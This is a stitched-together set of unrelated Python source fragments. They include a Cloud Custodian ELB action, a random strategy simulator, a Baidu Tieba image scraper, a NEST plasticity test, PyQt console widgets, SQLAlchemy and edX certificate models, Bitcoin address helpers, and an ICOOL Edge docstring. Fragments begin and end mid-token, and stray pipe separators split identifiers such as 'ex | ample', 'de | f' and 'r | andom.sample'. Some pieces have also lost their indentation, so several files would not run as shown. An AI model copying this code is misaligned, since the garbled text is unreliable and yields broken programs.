    permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)

    def process(self, resources):
        client = local_session(self.manager.session_factory).client('elb')
        for balancer in resources:
            client.modify_load_balancer_attributes(
                LoadBalancerName=balancer['LoadBalancerName'],
                LoadBalancerAttributes={'AccessLog': {'Enabled': False}})
        return resources
def is_ssl(b):
    """Return True when any listener on *b* uses the HTTPS or SSL protocol."""
    return any(
        ld['Listener']['Protocol'] in ('HTTPS', 'SSL')
        for ld in b['ListenerDescriptions'])
@filters.register('security-group')
class SecurityGroupFilter(net_filters.SecurityGroupFilter):
"""ELB secu |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 27 18:31:59 2017
@author: katsuya.ishiyama
"""
from numpy import random
# Definition of module level constants
SUCCESS_CODE = 1
FAILURE_CODE = 0
class Strategy():
    """A pool of *n* strategies, each with a random success probability.

    Strategies are chosen at random without replacement from the stock,
    then tried as Bernoulli trials via try_strategy().
    """

    def __init__(self, n):
        # One success probability per strategy, keyed by id 1..n.
        _success_probability = _generate_success_probability(n)
        _strategy = {i: p for i, p in enumerate(_success_probability, 1)}
        self._n = n
        self.strategy = _strategy
        # IDs not yet chosen; choose_strategy() draws from and shrinks it.
        self.stock_of_strategy = list(_strategy.keys())
        # History of every id passed to try_strategy().
        self.tried_strategy = []
        self.current_strategy = None
        self.previous_strategy = None
        self.count_same_strategy = 0
        self._result_of_trial = None

    def choose_strategy(self):
        """Draw a strategy id at random from the stock (without replacement).

        Returns a dict with the chosen id and its success probability.
        Raises ValueError when the stock is exhausted.
        """
        if not self.stock_of_strategy:
            raise ValueError('There is no strategy in stock.')
        _chosen_id = random.choice(self.stock_of_strategy, 1)[0]
        self.previous_strategy = self.current_strategy
        self.current_strategy = _chosen_id
        self.count_same_strategy = 0
        self.stock_of_strategy.remove(_chosen_id)
        _chosen_strategy = {
            'chosen_strategy': _chosen_id,
            'success_probability': self._get_success_probability()
        }
        return _chosen_strategy

    def _get_success_probability(self):
        # Success probability of the currently selected strategy.
        return self.strategy[self.current_strategy]

    def try_strategy(self):
        """Run one Bernoulli trial of the current strategy.

        Returns SUCCESS_CODE or FAILURE_CODE; raises ValueError when no
        strategy has been chosen yet.
        """
        if not self.current_strategy:
            raise ValueError('No strategy is chosen.')
        self.tried_strategy.append(self.current_strategy)
        self._result_of_trial = _get_trial_result(
            p=self._get_success_probability()
        )
        # NOTE(review): choose_strategy() removes ids from the stock, so
        # current and previous appear never to be equal -- confirm whether
        # this counter is actually reachable.
        if self.current_strategy == self.previous_strategy:
            self.count_same_strategy += 1
        return self._result_of_trial
def _get_trial_result(p):
    """Draw one Bernoulli trial: SUCCESS_CODE with probability *p*."""
    outcome = random.choice(
        [FAILURE_CODE, SUCCESS_CODE], size=1, p=[1 - p, p])
    return outcome[0]
def _generate_success_probability(size):
return r | andom.sample(size)
|
import urllib2
from HTMLParser import HTMLParser
from traceback import print_exc
from sys import stderr
class _DeHTMLParser(HTMLParser):
'''
利用HTMLParse来解析网页元素
'''
def __init__(self):
HTMLParser.__init__(self)
self.img_links = []
def handle_starttag(self, tag, attrs):
if tag == 'img':
# print(attrs)
try:
if ('pic_type','0') in attrs:
for name, value in attrs:
if name == 'src':
self.img_links.append(value)
except Exception as e:
print(e)
return self.img_links
def dehtml(text):
    '''
    Return the list of matching image links found in *text*.  On any
    parse error the traceback is printed and *text* is returned as-is.
    '''
    try:
        collector = _DeHTMLParser()
        collector.feed(text)
        collector.close()
    except:
        print_exc(file=stderr)
        return text
    return collector.img_links
de | f main():
html = urllib2.urlopen('http://tieba.baidu.com/p/2166231880')
content = html.read()
print(dehtml(content))
i = 0
for img_list in dehtml(content):
img_content = urllib2.urlopen(img_list).read()
path_name = str(i)+'.jpg'
with open(path_name,'wb') as f:
f.write(img_content)
i+=1
# Run the crawler when executed as a script.
if __name__ == '__main__':
    main()
#!/usr/bin/env python2
""" This is the main module, used to launch the persistency engine """
#from persio import iohandler
import persui.persinterface as ui
def main():
    """Start the user interface and keep it running forever."""
    app = ui.Persinterface()
    while True:
        # One run() call returning just means an interaction finished;
        # immediately start the next one.
        app.run()
# Script entry point.
if __name__ == '__main__':
    main()
"""
def main_old():
keynames = ["A", "B"]
graph_data1 = [(0, 0, 0, 1), (0, 1, 2, 3)]
gr | aph_data2 = [(2, 3, 0, 1), (0, 6, | 2, 8)]
graph_data = [graph_data1, graph_data2]
name = "tree.xml"
root = iohandler.xh.createindex(keynames)
for i in xrange(2):
iohandler.xh.creategraph(root, graph_data[i], keynames[i], 2)
iohandler.xh.writexml(root, name)
"""
|
# -*- coding: utf-8 -*-
#
# test_get_sp_status.py
#
# This file is part of NEST.
#
# Copyr | ight (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distribu | ted in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Structural Plasticity GetStatus Test
-----------------------
This tests the functionality of the GetStructuralPlasticityStatus
function
"""
import nest
import unittest
__author__ = 'sdiaz'
class TestGetStructuralPlasticityStatus(unittest.TestCase):
    """Exercise nest.GetStructuralPlasticityStatus().

    The previous version ran everything at class-definition time (i.e. as
    an import side effect) and defined no ``test*`` method, so
    ``suite()`` -- which collects methods prefixed 'test' -- gathered
    nothing.  The checks now live in a proper test method.
    """

    def test_get_sp_status(self):
        neuron_model = 'iaf_psc_alpha'
        nest.CopyModel('static_synapse', 'synapse_ex')
        nest.SetDefaults('synapse_ex', {'weight': 1.0, 'delay': 1.0})
        nest.SetStructuralPlasticityStatus({
            'structural_plasticity_synapses': {
                'synapse_ex': {
                    'model': 'synapse_ex',
                    'post_synaptic_element': 'Den_ex',
                    'pre_synaptic_element': 'Axon_ex',
                },
            }
        })
        growth_curve = {
            'growth_curve': "gaussian",
            'growth_rate': 0.0001,  # (elements/ms)
            'continuous': False,
            'eta': 0.0,  # Ca2+
            'eps': 0.05
        }
        # Assign the growth curves to the corresponding synaptic elements.
        synaptic_elements = {
            'Den_ex': growth_curve,
            'Den_in': growth_curve,
            'Axon_ex': growth_curve,
        }
        nodes = nest.Create(neuron_model,
                            2,
                            {'synaptic_elements': synaptic_elements}
                            )
        # Renamed from 'all', which shadowed the builtin.
        status = nest.GetStructuralPlasticityStatus()
        print(status)
        assert 'structural_plasticity_synapses' in status
        # The synapse entry is keyed by the configured name 'synapse_ex';
        # the previous assertions looked up 'syn1', which was never
        # configured above.
        assert 'synapse_ex' in status['structural_plasticity_synapses']
        assert 'structural_plasticity_update_interval' in status
        assert status['structural_plasticity_update_interval'] == 1000
        sp_synapses = nest.GetStructuralPlasticityStatus(
            'structural_plasticity_synapses'
        )
        print(sp_synapses)
        syn = sp_synapses['synapse_ex']
        assert 'pre_synaptic_element' in syn
        assert 'post_synaptic_element' in syn
        assert syn['pre_synaptic_element'] == 'Axon_ex'
        assert syn['post_synaptic_element'] == 'Den_ex'
        sp_interval = nest.GetStructuralPlasticityStatus(
            'structural_plasticity_update_interval'
        )
        print(sp_interval)
        assert sp_interval == 1000
def suite():
    """Build the suite of all ``test*`` methods of the status test case."""
    # unittest.makeSuite() is deprecated and removed in Python 3.13;
    # TestLoader.loadTestsFromTestCase() is the supported equivalent and
    # uses the same default 'test' method-name prefix.
    return unittest.TestLoader().loadTestsFromTestCase(
        TestGetStructuralPlasticityStatus
    )


if __name__ == '__main__':
    unittest.main()
|
from filer.app | s import FilerConfig
class MyFilerConfig(FilerConfig):
    """AppConfig override for django-filer with a localized display name."""

    # German UI label ("file management") shown in the Django admin.
    verbose_name = "Dateiverwaltung"
| |
# Copyright (c) 2015 Aaron Kehrer
# Licensed under the terms of the MIT License
# (see fiddle/__init__.py for details)
import os
import unicodedata
from io import StringIO
from PyQt4 import QtCore, QtGui
from fiddle.config import EDITOR_FONT, EDITOR_FONT_SIZE
class PyConsoleTextBrowser(QtGui.QTextBrowser):
    """Editable text browser acting as an interactive console.

    Keystrokes are echoed into the document; on Return, everything typed
    since the current insert position is written to the attached process.
    """

    def __init__(self, parent=None, process=None):
        super(PyConsoleTextBrowser, self).__init__(parent)
        # QProcess (or compatible object with write()) that receives the
        # user's input lines; may be None, which disables console handling.
        self.process = process
        # The start position in the QTextBrowser document where new user input will be inserted
        self._input_insert_pos = -1
        # Previously submitted lines. history_idx is relative: Up walks it
        # negative, exploiting Python's negative list indexing.
        self.history = []
        self.history_idx = 0
        self.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.setAcceptRichText(False)
        self.setReadOnly(False)
        self.setOpenExternalLinks(False)
        self.setOpenLinks(False)
        self.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse | QtCore.Qt.TextEditorInteraction)

    def keyPressEvent(self, event):
        """Handle Up/Down history recall and Return submission.

        The event is always forwarded to QTextBrowser afterwards so normal
        editing behaviour is preserved.
        """
        if self.process is not None:
            # Skip keys modified with Ctrl or Alt
            if event.modifiers() != QtCore.Qt.ControlModifier and event.modifiers() != QtCore.Qt.AltModifier:
                # Get the insert cursor and make sure it's at the end of the console
                cursor = self.textCursor()
                cursor.movePosition(QtGui.QTextCursor.End)
                # First keystroke of a new input line: remember where the
                # user's text starts so it can be selected/cleared later.
                if self._input_insert_pos < 0:
                    self._input_insert_pos = cursor.position()
                # Scroll view to end of console
                self.setTextCursor(cursor)
                self.ensureCursorVisible()
                # Process the key event
                if event.key() == QtCore.Qt.Key_Up:
                    # Clear any previous input
                    self._clear_insert_line(cursor)
                    # Walk backwards through the history (negative indexing
                    # wraps from the end of the list).
                    if len(self.history) > 0:
                        self.history_idx -= 1
                        try:
                            cursor.insertText(self.history[self.history_idx])
                        except IndexError:
                            # Stepped past the oldest entry: undo the step.
                            self.history_idx += 1
                            cursor.insertText('')
                elif event.key() == QtCore.Qt.Key_Down:
                    # Clear any previous input
                    self._clear_insert_line(cursor)
                    # Walk forwards, but only while history_idx <= 0
                    # (chained comparison: len > 0 and 0 >= history_idx).
                    if len(self.history) > 0 >= self.history_idx:
                        self.history_idx += 1
                        try:
                            cursor.insertText(self.history[self.history_idx])
                        except IndexError:
                            # Walked past the newest entry: undo and blank.
                            self.history_idx -= 1
                            cursor.insertText('')
                elif event.key() == QtCore.Qt.Key_Return:
                    # Send the typed line (newline-terminated, UTF-8) to the
                    # child process.
                    txt = self._select_insert_line(cursor)
                    self.process.write('{0}\n'.format(txt).encode('utf-8'))
                    # Reset the insert position
                    self._input_insert_pos = -1
                    # Update the history
                    self.history.append(txt)
                    self.history_idx = 0
        # Pass the event on to the parent for handling
        return QtGui.QTextBrowser.keyPressEvent(self, event)

    def _clear_insert_line(self, cursor):
        """
        Remove all the displayed text from the input insert line and clear the input buffer
        """
        cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
        cursor.removeSelectedText()

    def _select_insert_line(self, cursor):
        # Select from the input start position to the cursor and return the
        # selected text (the user's current input line).
        cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
        txt = cursor.selectedText()
        cursor.clearSelection()
        return txt
class PyConsoleLineEdit(QtGui.QLineEdit):
    """
    Single-line console input with Tab insertion and Up/Down history.

    https://wiki.python.org/moin/PyQt/Adding%20tab-completion%20to%20a%20QLineEdit
    http://www.saltycrane.com/blog/2008/01/how-to-capture-tab-key-press-event-with/
    """
    def __init__(self):
        super(PyConsoleLineEdit, self).__init__()
        line_font = QtGui.QFont()
        line_font.setFamily(EDITOR_FONT)
        line_font.setPointSize(EDITOR_FONT_SIZE)
        self.setFont(line_font)
        # Submitted lines; history_idx points one past the most recent
        # entry after each Return.
        self.history = []
        self.history_idx = -1

    def event(self, event):
        """Intercept Tab/Up/Down/Return before default QLineEdit handling."""
        if event.type() == QtCore.QEvent.KeyPress:
            if event.key() == QtCore.Qt.Key_Tab:
                # Insert four spaces instead of moving focus, but only when
                # the line is blank (indentation aid).
                if self.text().strip() == '':
                    self.setText(self.text() + '    ')
                return True
            elif event.key() == QtCore.Qt.Key_Up:
                # Recall the previous history entry, stopping at the oldest.
                if len(self.history) > 0 and self.history_idx > 0:
                    self.history_idx -= 1
                    self.setText(self.history[self.history_idx])
                return True
            elif event.key() == QtCore.Qt.Key_Down:
                # Recall the next entry (chained comparison: history is
                # non-empty and history_idx < len); past the newest, blank.
                if 0 < len(self.history) > self.history_idx:
                    self.history_idx += 1
                    try:
                        self.setText(self.history[self.history_idx])
                    except IndexError:
                        self.setText('')
                return True
            elif event.key() == QtCore.Qt.Key_Return:
                # Append to history unless it repeats the last entry;
                # EAFP handles the initially-empty history list.
                try:
                    if self.history[-1] != self.text():
                        self.history.append(self.text())
                except IndexError:
                    self.history.append(self.text())
                self.history_idx = len(self.history)
                return QtGui.QLineEdit.event(self, event)
        return QtGui.QLineEdit.event(self, event)
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012 Cloudscaling Group, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models.
"""
import six
from sqlalchemy import Column, Integer
from sqlalchemy import DateTime
from sqlalchemy.orm import object_mapper
from solum.openstack.common.db.sqlalchemy import session as sa
from solum.openstack.common import timeutils
class ModelBase(object):
    """Base class for models.

    Provides dict-style access (``obj['key']``, ``obj.get``), iteration
    over mapped columns as ``(name, value)`` pairs, and a ``save`` helper.
    """
    __table_initialized__ = False

    def save(self, session=None):
        """Save this object to the given (or default) session."""
        if not session:
            session = sa.get_session()
        # NOTE(boris-42): This part of code should be look like:
        #                   session.add(self)
        #                   session.flush()
        #                 But there is a bug in sqlalchemy and eventlet that
        #                 raises NoneType exception if there is no running
        #                 transaction and rollback is called. As long as
        #                 sqlalchemy has this bug we have to create transaction
        #                 explicitly.
        with session.begin(subtransactions=True):
            session.add(self)
            session.flush()

    def __setitem__(self, key, value):
        setattr(self, key, value)

    def __getitem__(self, key):
        return getattr(self, key)

    def get(self, key, default=None):
        return getattr(self, key, default)

    @property
    def _extra_keys(self):
        """Specifies custom fields
        Subclasses can override this property to return a list
        of custom fields that should be included in their dict
        representation.
        For reference check tests/db/sqlalchemy/test_models.py
        """
        return []

    def __iter__(self):
        # Bug fix: dict.keys() returns a view on Python 3, which has no
        # extend(); materialize it as a list so this works under both
        # Python 2 and 3 (the module already uses six for 2/3 compat).
        columns = list(dict(object_mapper(self).columns).keys())
        # NOTE(russellb): Allow models to specify other keys that can be looked
        # up, beyond the actual db columns.  An example would be the 'name'
        # property for an Instance.
        columns.extend(self._extra_keys)
        self._i = iter(columns)
        return self

    def next(self):
        """Python 2 iterator protocol; aliased to __next__ for Python 3."""
        n = six.advance_iterator(self._i)
        return n, getattr(self, n)

    # Python 3 iterator protocol entry point.
    __next__ = next

    def update(self, values):
        """Make the model object behave like a dict."""
        for k, v in six.iteritems(values):
            setattr(self, k, v)

    def iteritems(self):
        """Make the model object behave like a dict.
        Includes attributes from joins.
        """
        local = dict(self)
        joined = dict([(k, v) for k, v in six.iteritems(self.__dict__)
                       if not k[0] == '_'])
        local.update(joined)
        return six.iteritems(local)
class TimestampMixin(object):
    """Mixin adding automatic created_at/updated_at timestamp columns."""

    # Set once when the row is inserted.
    created_at = Column(DateTime, default=lambda: timeutils.utcnow())
    # Refreshed on every update.
    updated_at = Column(DateTime, onupdate=lambda: timeutils.utcnow())
class SoftDeleteMixin(object):
    """Mixin adding soft-delete support: rows are flagged, not removed."""

    deleted_at = Column(DateTime)
    # 0 for live rows; set to the row's own id on soft delete.
    deleted = Column(Integer, default=0)

    def soft_delete(self, session=None):
        """Mark this object as deleted."""
        # Assumes the concrete model defines an 'id' column -- true for
        # the mapped models this mixin is combined with.
        self.deleted = self.id
        self.deleted_at = timeutils.utcnow()
        self.save(session=session)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2018 David Arroyo Menéndez
# Author: David Arroyo Menéndez <davidam@gnu.org>
# Maintainer: David Arroyo Menéndez <davidam@gnu.org>
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of |
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with GNU Emacs; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Flo | or,
# Boston, MA 02110-1301 USA,
from bokeh.plotting import figure, show, output_file
from bokeh.tile_providers import CARTODBPOSITRON

# Render the plot to a standalone HTML file.
output_file("tile.html")

# range bounds supplied in web mercator coordinates
p = figure(x_range=(-2000000, 6000000), y_range=(-1000000, 7000000),
           x_axis_type="mercator", y_axis_type="mercator")
# Overlay the CartoDB Positron basemap tiles.
p.add_tile(CARTODBPOSITRON)
show(p)
|
#!/usr/bin/env python
# coding=utf-8
from toughlogger.common import pyforms
from toughlogger.common.pyforms import rules
from toughlogger.common.pyforms.rules import button_style, input_style
password_update_form = pyforms.Form(
pyforms.Textbox("tra_user", description=u"管理员名", size=32, readonly="readonly", **input_sty | le),
pyforms.Password("tra_user_pass", rules.len_of(6, 32), description=u"管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Password("tra_user_pass_chk", rules.len_of(6, 32), description=u"确认管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Button("submit", type="submit", html=u"<b>更新</b>", **b | utton_style),
title=u"管理密码更新",
action="/password"
)
|
xample certificates
have been started yet, returns None.
"""
try:
latest = cls.objects.filter(course_key=course_key).latest()
except cls.DoesNotExist:
return None
queryset = ExampleCertificate.objects.filter(example_cert_set=latest).order_by('-created')
return [cert.status_dict for cert in queryset]
def __iter__(self):
"""Iterate through example certificates in the set.
Yields:
ExampleCertificate
"""
queryset = (ExampleCertificate.objects).select_related('example_cert_set').filter(ex | ample_cert_set=self)
for cert in queryset:
yield cert
@staticmethod
def _template_for_mode(mode_slug, course_key):
"""Calculate the template PDF based on the course mode. """
return (
u"certificate-template-{key.org}-{key.course}-verified.pdf".format(key=course_key)
if mode_slug == 'verified'
else u"certificate-template-{key.org}-{key.course}.pdf".format(key=course_key)
)
def | _make_uuid():
"""Return a 32-character UUID. """
return uuid.uuid4().hex
class ExampleCertificate(TimeStampedModel):
    """Example certificate.
    Example certificates are used to verify that certificate
    generation is working for a particular course.
    An example certificate is similar to an ordinary certificate,
    except that:
    1) Example certificates are not associated with a particular user,
    and are never displayed to students.
    2) We store the "inputs" for generating the example certificate
    to make it easier to debug when certificate generation fails.
    3) We use dummy values.
    """
    # Statuses
    STATUS_STARTED = 'started'
    STATUS_SUCCESS = 'success'
    STATUS_ERROR = 'error'

    # Dummy full name for the generated certificate
    EXAMPLE_FULL_NAME = u'John Doë'

    # The batch of example certificates this one belongs to.
    example_cert_set = models.ForeignKey(ExampleCertificateSet)
    description = models.CharField(
        max_length=255,
        help_text=ugettext_lazy(
            u"A human-readable description of the example certificate.  "
            u"For example, 'verified' or 'honor' to differentiate between "
            u"two types of certificates."
        )
    )

    # Inputs to certificate generation
    # We store this for auditing purposes if certificate
    # generation fails.
    uuid = models.CharField(
        max_length=255,
        default=_make_uuid,
        db_index=True,
        unique=True,
        help_text=ugettext_lazy(
            u"A unique identifier for the example certificate.  "
            u"This is used when we receive a response from the queue "
            u"to determine which example certificate was processed."
        )
    )
    access_key = models.CharField(
        max_length=255,
        default=_make_uuid,
        db_index=True,
        help_text=ugettext_lazy(
            u"An access key for the example certificate.  "
            u"This is used when we receive a response from the queue "
            u"to validate that the sender is the same entity we asked "
            u"to generate the certificate."
        )
    )
    full_name = models.CharField(
        max_length=255,
        default=EXAMPLE_FULL_NAME,
        help_text=ugettext_lazy(u"The full name that will appear on the certificate.")
    )
    template = models.CharField(
        max_length=255,
        help_text=ugettext_lazy(u"The template file to use when generating the certificate.")
    )

    # Outputs from certificate generation
    status = models.CharField(
        max_length=255,
        default=STATUS_STARTED,
        choices=(
            (STATUS_STARTED, 'Started'),
            (STATUS_SUCCESS, 'Success'),
            (STATUS_ERROR, 'Error')
        ),
        help_text=ugettext_lazy(u"The status of the example certificate.")
    )
    error_reason = models.TextField(
        null=True,
        default=None,
        help_text=ugettext_lazy(u"The reason an error occurred during certificate generation.")
    )
    download_url = models.CharField(
        max_length=255,
        null=True,
        default=None,
        help_text=ugettext_lazy(u"The download URL for the generated certificate.")
    )

    def update_status(self, status, error_reason=None, download_url=None):
        """Update the status of the example certificate.
        This will usually be called either:
        1) When an error occurs adding the certificate to the queue.
        2) When we receieve a response from the queue (either error or success).
        If an error occurs, we store the error message;
        if certificate generation is successful, we store the URL
        for the generated certificate.
        Arguments:
            status (str): Either `STATUS_SUCCESS` or `STATUS_ERROR`
        Keyword Arguments:
            error_reason (unicode): A description of the error that occurred.
            download_url (unicode): The URL for the generated certificate.
        Raises:
            ValueError: The status is not a valid value.
        """
        if status not in [self.STATUS_SUCCESS, self.STATUS_ERROR]:
            msg = u"Invalid status: must be either '{success}' or '{error}'.".format(
                success=self.STATUS_SUCCESS,
                error=self.STATUS_ERROR
            )
            raise ValueError(msg)
        self.status = status
        # Only store the extra detail that matches the new status.
        if status == self.STATUS_ERROR and error_reason:
            self.error_reason = error_reason
        if status == self.STATUS_SUCCESS and download_url:
            self.download_url = download_url
        self.save()

    @property
    def status_dict(self):
        """Summarize the status of the example certificate.
        Returns:
            dict
        """
        result = {
            'description': self.description,
            'status': self.status,
        }
        # Optional keys are present only when they have a value.
        if self.error_reason:
            result['error_reason'] = self.error_reason
        if self.download_url:
            result['download_url'] = self.download_url
        return result

    @property
    def course_key(self):
        """The course key associated with the example certificate. """
        return self.example_cert_set.course_key
class CertificateGenerationCourseSetting(TimeStampedModel):
    """Enable or disable certificate generation for a particular course.
    This controls whether students are allowed to "self-generate"
    certificates for a course.  It does NOT prevent us from
    batch-generating certificates for a course using management
    commands.
    In general, we should only enable self-generated certificates
    for a course once we successfully generate example certificates
    for the course.  This is enforced in the UI layer, but
    not in the data layer.
    """
    course_key = CourseKeyField(max_length=255, db_index=True)
    enabled = models.BooleanField(default=False)

    class Meta:  # pylint: disable=missing-docstring, old-style-class
        get_latest_by = 'created'

    @classmethod
    def is_enabled_for_course(cls, course_key):
        """Check whether self-generated certificates are enabled for a course.
        Arguments:
            course_key (CourseKey): The identifier for the course.
        Returns:
            boolean
        """
        try:
            latest = cls.objects.filter(course_key=course_key).latest()
        except cls.DoesNotExist:
            # No setting has ever been stored for this course:
            # default to disabled.
            return False
        else:
            return latest.enabled

    @classmethod
    def set_enabled_for_course(cls, course_key, is_enabled):
        """Enable or disable self-generated certificates for a course.
        Arguments:
            course_key (CourseKey): The identifier for the course.
            is_enabled (boolean): Whether to enable or disable self-generated certificates.
        """
        # A new row is created (rather than updating in place) so the
        # table keeps a history; readers always use the latest row.
        CertificateGenerationCourseSetting.objects.create(
            course_key=course_key,
            enabled=is_enabled
        )
class CertificateGenerationConfiguration(ConfigurationModel):
"""Configure certificate generation.
Enable or disable the self-generated certific |
#!/usr/bin/env python
import binascii
import hashlib
from reversecoin.bitcoin.key import CKey as Key
from reversecoin.bitcoin.base58 import encode, decode
def myhash(s):
    """Return the double SHA-256 digest of *s* (Bitcoin checksum hash)."""
    inner = hashlib.sha256(s).digest()
    return hashlib.sha256(inner).digest()
def myhash160(s):
    """Return RIPEMD-160(SHA-256(s)) -- Bitcoin's HASH160.

    NOTE(review): hashlib.new('ripemd160') relies on the underlying
    OpenSSL build providing RIPEMD-160; some modern builds omit it.
    """
    sha_digest = hashlib.sha256(s).digest()
    ripemd = hashlib.new('ripemd160')
    ripemd.update(sha_digest)
    return ripemd.digest()
def getnewaddress():
    """Generate a fresh keypair and its main-network Base58Check address.

    Returns:
        (public_key, private_key, address) -- raw key byte strings from
        the EC key object plus the encoded address string.

    NOTE: Python 2 only -- relies on str.encode('hex') and on
    concatenating '\\x00' str literals with hash digests.
    """
    # Generate public and private keys
    key = Key()
    key.generate()
    key.set_compressed(True)
    private_key = key.get_privkey()
    public_key = key.get_pubkey()
    private_key_hex = private_key.encode('hex')
    public_key_hex = public_key.encode('hex')
    public_key_bytearray = bytearray.fromhex(public_key_hex)
    # Perform SHA-256 and RIPEMD-160 hashing on public key
    hash160_address = myhash160(public_key_bytearray)
    # add version byte: 0x00 for Main Network
    extended_address = '\x00' + hash160_address
    # generate double SHA-256 hash of extended address
    hash_address = myhash(extended_address)
    # Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
    checksum = hash_address[:4]
    # Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
    binary_address = extended_address + checksum
    # Convert the result from a byte string into a base58 string using Base58Check encoding.
    address = encode(binary_address)
    return public_key, private_key, address
def public_key_to_address(public_key):
    """Derive the main-network Base58Check address for a raw public key.

    Arguments:
        public_key: raw public key byte string (Python 2 str).

    Returns:
        The Base58Check-encoded address string.
    """
    # The original body duplicated public_key_hex_to_address() step by
    # step; delegate instead so the HASH160/checksum logic lives in one
    # place.
    public_key_hex = public_key.encode('hex')
    return public_key_hex_to_address(public_key_hex)
def public_key_hex_to_address(public_key_hex):
    """Convert a hex-encoded public key to a main-network Base58Check address."""
    raw_key = bytearray.fromhex(public_key_hex)
    # HASH160: SHA-256 followed by RIPEMD-160 of the public key.
    key_hash = myhash160(raw_key)
    # Prepend the version byte (0x00 for the main network).
    versioned = '\x00' + key_hash
    # Checksum: first 4 bytes of the double SHA-256 of the payload.
    check = myhash(versioned)[:4]
    # Base58Check-encode the 25-byte payload + checksum.
    return encode(versioned + check)
# fix this
def address_to_public_key_hash(address):
    """Decode a Base58Check address back to its 20-byte HASH160 payload.

    NOTE(review): the trailing checksum is stripped but never verified.
    """
    raw = decode(address)
    # Drop the leading version byte and the trailing 4 checksum bytes.
    return raw[1:-4]
def public_key_hex_to_pay_to_script_hash(public_key_hex):
    """Build a pay-to-pubkey script: PUSH(0x41) <pubkey> OP_CHECKSIG (0xAC)."""
    script_hex = "41%sAC" % public_key_hex
    return binascii.unhexlify(script_hex)
def address_to_pay_to_pubkey_hash(address):
    # Unimplemented stub: prints a notice and terminates the whole
    # process when called.
    print "Not implemented >>>>>>>>>>>>>>>>>>>"
    exit(0)
def output_script_to_public_key_hash(script):
    """Extract the pubkey from a pay-to-pubkey script; return hex(HASH160)."""
    # Strip the push opcode (first byte) and OP_CHECKSIG (last byte),
    # leaving the raw public key bytes.
    pubkey_hex = binascii.hexlify(script[1:-1])
    key_hash = myhash160(bytearray.fromhex(pubkey_hex))
    return binascii.hexlify(key_hash)
def address_to_output_script(address):
    """Placeholder: address-to-output-script conversion is not implemented."""
    pass
if __name__ == "__main__":
    # Manual smoke test using two well-known mainnet addresses/keys
    # (the second pair is the genesis-block coinbase key).
    address1 = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM"
    address2 = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
    public_key_hex1 = "0450863AD64A87AE8A2FE83C1AF1A8403CB53F53E486D8511DAD8A04887E5B23522CD470243453A299FA9E77237716103ABC11A1DF38855ED6F2EE187E9C582BA6"
    public_key_hex2 = "04678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5f"
    print "address: ", address1
    print "public key_hex: ", public_key_hex1
    #print "public_keys_hex: ", public_key_hex1, public_key_hex2
    print "public key to address: ", public_key_hex_to_address(public_key_hex1)
    print "address to public key hash: ", binascii.hexlify(address_to_public_key_hash(address1))
    # print "public key hash: ", binascii.hexlify(myhash160(bytearray.fromhex(public_key_hex1)))
|
from pseudoregion import *
class Edge(PseudoRegion):
    """EDGE Fringe field and other kicks for hard-edged field models
    1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
    2.1) model # (I) {1}
    2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
    Edge type = SOL
    p1: BS [T]
    If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
    Edge type = DIP
    p1: BY [T]
    Edge type = HDIP
    p1: BX [T]
    Edge type = DIP3
    p1: rotation angle [deg]
    p2: BY0 [T]
    p3: flag 1:in 2:out
    Edge type = QUAD
    p1: gradient [T/m]
    Edge type = SQUA
    p1: gradient [T/m]
    Edge type = SEX
    p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
    Edge type = BSOL
    p1: BS [T]
    p2: BY [T]
    p3: 0 for entrance face, 1 for exit face
    Edge type = FACE
    This gives vertical focusing from rotated pole faces.
    p1: pole face angle [deg]
    p2: radius of curvature of reference particle [m]
    p3: if not 0 => correct kick by factor 1/(1+delta)
    p4: if not 0 ==> apply horizontal focus with strength = (-vertical strength)
    If a FACE command is used before and after a sector dipole (DIP), you can approximate a rectangular dipole field.
